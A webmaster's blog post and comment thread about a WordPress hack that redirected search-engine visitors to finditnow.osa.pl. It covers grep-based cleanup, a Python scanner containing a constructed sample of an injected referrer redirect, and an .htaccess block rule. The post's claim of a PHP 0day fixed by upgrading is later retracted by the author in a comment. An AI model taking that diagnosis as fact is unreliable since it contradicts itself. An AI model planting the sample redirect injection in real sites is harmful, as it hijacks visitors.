Late last night I realized that the traffic for Question-Defense.com was way down for the day and thought it was related to some recent updates I had performed on the site. I spent probably an hour or so last night verifying that nothing was out of the ordinary with the site and wasn’t able to find any issues. Upon waking up this morning the traffic was again extremely low for this time of day, even for a Saturday, so we started to investigate. One of the referrers whose traffic had dramatically decreased was Google, so we went to Google and performed a search that we knew would return a link to Question-Defense.com. Sure enough, upon clicking on the link in Google’s results we hit the question-defense.com URL and were then immediately redirected to finditnow.osa.pl. Below we describe the issue in more detail, provide specifics about how our site was hacked, and provide the information needed to locate and resolve the problem.
How We Located The finditnow.osa.pl Hack:
Again, after spending some time looking over recent updates to the question-defense.com site, we wanted to see this from a visitor’s perspective and went to Google to perform a search. The search we performed is noted below.
Search Performed On Google:
- xbox 360: your nat type is moderate
When clicking the link returned by Google, which happened to be the third result, we hit the question-defense.com page but were immediately redirected to finditnow.osa.pl, as shown in the example picture below.
Google Search Results Hijacked By finditnow.osa.pl:
When everything is functioning properly the Question-Defense.com result on Google should have sent the visitor to the page below instead. You will notice that the hack is clever: it takes the visitor arriving from Google and redirects them to a new page with results on the same subject.
Google Search Results Not Hijacked By finditnow.osa.pl:
So we were able to track the issue to the site itself. After a short amount of time we located the PHP 0day in PHP 5.2.X which allows people to modify files hosted on a server running PHP 5.2.X. In this example the hackers using the 0day did not redirect all traffic; instead they generated traffic for the osa.pl domain by overwriting only two files on a web site running WordPress so that only traffic arriving from search engines is redirected. This is clever for numerous reasons, including the fact that when you are attempting to locate the cause of a drop in traffic to your site you are likely to go directly to your site, where it will appear to function without issue. Until you perform a Google search, or a search using another search engine such as Bing, Yahoo, Baidu, Search, etc., you will think everything is working without issue.
Fix finditnow.osa.pl Hack On WordPress Site:
First off you should upgrade PHP from version 5.2.X to 5.3.X immediately, which will stop the 0day from being performed on your site again. On CentOS Linux you can simply type “yum update php” to upgrade PHP. Make sure the upgrade takes you to 5.3.X and if not search for a Yum repo that does include a 5.3.X version of PHP. After upgrading PHP, which can be done using numerous different repositories such as CHL, Atomic, and numerous others, you should look in the wp-content directory located in the root of your WordPress site. The files modified in our case were advanced-cache.php and wp-cache-config.php; however, it may be these same files or others on your site, so you should use the below command from the root of your web site to locate all of the modified files.
Search For Modified Files That Redirect Users To finditnow.osa.pl:
- grep -r "eval(base64_decode" *
The above search, run from the root of your web site at the Linux command line, should return any infected files, which again on our WordPress site were advanced-cache.php and wp-cache-config.php only. Below is the snippet of PHP code added to the top of each file that performed the redirect to finditnow.osa.pl.
PHP Code Used To Redirect Users To finditnow.osa.pl:
- eval(base64_decode("[encoded payload omitted]"));
The above code was inserted directly after “<?php” at the top of each of the modified files. Once the line was removed, traffic arriving from Google immediately started working again. Again, make sure you upgrade PHP 5.2.X to PHP 5.3.X, because if not your site will continue to be manipulated in this manner and you will lose all of your search engine traffic.
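To go one step beyond the grep above, the following scanner (an added example, not code from the original post) walks a web root for the same `eval(base64_decode("..."))` construct, decodes the payload (peeling nested layers if present), and flags the indicators of a referrer-conditional redirect such as `HTTP_REFERER` and `header("Location:`. The sample file and payload embedded at the bottom are constructed for illustration and are not the payload found on the site.

```python
import base64
import os
import re

# The injected construct described in the article: eval(base64_decode("<base64>"));
INJECT_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)', re.I)

# Generic indicators of a search-engine-only redirect in the decoded payload.
# Assumption: illustrative strings, not the exact contents of the original payload.
INDICATORS = ("HTTP_REFERER", "header(", "Location:", "google", "bing", "yahoo")

def decode_payload(b64):
    """Decode the base64 payload, peeling up to five nested eval(base64_decode()) layers."""
    text = base64.b64decode(b64).decode("utf-8", "replace")
    for _ in range(5):
        m = INJECT_RE.search(text)
        if not m:
            break
        text = base64.b64decode(m.group(1)).decode("utf-8", "replace")
    return text

def scan_source(src):
    """Return (offset, decoded_payload, indicators_found) for every injected eval in src."""
    hits = []
    for m in INJECT_RE.finditer(src):
        decoded = decode_payload(m.group(1))
        found = [i for i in INDICATORS if i.lower() in decoded.lower()]
        hits.append((m.start(), decoded, found))
    return hits

def scan_tree(root):
    """Scan every .php file under root; return {path: hits} for files containing injections."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_source(fh.read())
                if hits:
                    report[path] = hits
    return report

# Constructed sample: a payload that redirects only visitors arriving from a search engine.
SAMPLE_PAYLOAD = (b'if (strpos($_SERVER["HTTP_REFERER"], "google") !== false) '
                  b'{ header("Location: http://redirect-target.invalid/"); exit; }')
SAMPLE_FILE = ('<?php eval(base64_decode("' + base64.b64encode(SAMPLE_PAYLOAD).decode()
               + '")); // rest of the original file follows\n')

if __name__ == "__main__":
    for off, decoded, found in scan_source(SAMPLE_FILE):
        print(f"offset {off}: indicators {found}\n{decoded}")
```

Run `scan_tree("/path/to/webroot")` to get a per-file report; the decoded text tells you whether a hit is this referrer-based redirect or some other injected code.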
Hi, noticed this on several websites over the weekend. Thank you for the post.
Hello steve,
No problem at all. Thanks for taking the time to leave feedback.
Thanks.
alex
Thanks for this. This hack has been driving me nuts. Hopefully site admins will take heed quickly.
Hello rosethorn,
No problem at all. Glad it was useful for you! Thanks for posting feedback.
Thanks.
alex
I am trying to get it off my Joomla website. Do you have any suggestions?
How do you get it off Joomla? Please help.
Hello Eugene,
The above instructions describe the basis of the hack. The server should also be secured as mentioned in the article and I would suggest having someone more familiar with the code remove this so it doesn’t continue to happen.
Thanks.
alex
But how is the hack carried out? Any other preventions we can make?
Hello Dunhamzz,
I was wrong in the initial post here where I say it relates to PHP 5.3. It appears to be an XSS scripting attack and can be blocked in .htaccess using the below lines which I obtained from the WordPress Bulletproof Security plugin.
.htaccess additions
#########
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR]
RewriteRule ^(.*)$ - [F,L]
#########
Thanks.
alex
I’m sorry, but where in .htaccess do I enter this line of code?
My site is in Joomla.
Hello istofir,
You would need to build a full set of rewrite rules which is beyond the scope of this article. If you already have the ReWrite engine turned on which you likely do for Joomla then you should be able to merge it with existing rules.
Thanks.
alex
I think this is one of the most vital info for me. And I’m glad reading your article. But should remark on a few general things: the site style is wonderful, the articles are really excellent :D. Good job, cheers
Hello torture,
No problem. Thanks for taking the time to leave feedback.
Thanks.
alex
My site got hacked today. Not sure if it has anything to do with the Windows Defender Virus that was trying to scam me to buy protection. Got rid of it after disabling start up programs after starting in safe mode. Antivirus found 68 infected files after that. But these two may not be related issues.
Check your server files in each directory, sort them by date and see if any file has been recently modified. It didn’t just insert one line, I found quite a few lines of code, including the base64_decode line.
Hello Tauno,
The article notes how to search all files within the web directory using the grep command. Hope you were able to get your issue sorted.
Thanks.
alex
Today I published an important article, and when posting it on Google+ I realized the disaster.
Thanks for the solution.
Hello ZioPal,
No problem. Glad it helped out. Thanks for taking the time to post feedback.
Thanks.
alex